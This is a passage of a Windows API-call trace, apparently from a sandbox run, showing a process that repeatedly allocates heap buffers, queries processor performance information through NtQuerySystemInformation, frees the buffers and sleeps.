Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0203.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0203.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0203.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.835] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0203.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0203.835] Sleep (dwMilliseconds=0x110) [0204.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.131] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.132] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.132] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.132] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.133] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.133] Sleep (dwMilliseconds=0x110) [0204.211] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.211] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.212] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.212] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.212] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.212] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.212] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.212] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.213] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.213] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.213] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.214] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.214] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.215] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.215] Sleep (dwMilliseconds=0x110) [0204.242] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.242] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.243] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.259] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.259] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.260] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.260] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.266] Sleep (dwMilliseconds=0x110) [0204.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.302] Sleep (dwMilliseconds=0x110) [0204.320] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.321] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.321] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.321] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.322] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.322] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.330] Sleep (dwMilliseconds=0x110) [0204.352] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.352] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.383] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.383] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.384] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.384] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.384] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.384] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.384] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.385] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.385] Sleep (dwMilliseconds=0x110) [0204.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.436] Sleep (dwMilliseconds=0x110) [0204.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.476] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.476] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.476] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.476] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.476] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.477] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.477] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.477] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.477] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.478] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.478] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.478] Sleep (dwMilliseconds=0x110) [0204.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.519] Sleep (dwMilliseconds=0x110) [0204.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.535] Sleep (dwMilliseconds=0x110) [0204.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.550] Sleep (dwMilliseconds=0x110) [0204.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.563] Sleep (dwMilliseconds=0x110) [0204.575] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.575] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.578] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.578] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.580] Sleep (dwMilliseconds=0x110) [0204.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.594] HeapFree (in: hHeap=0x2560000, 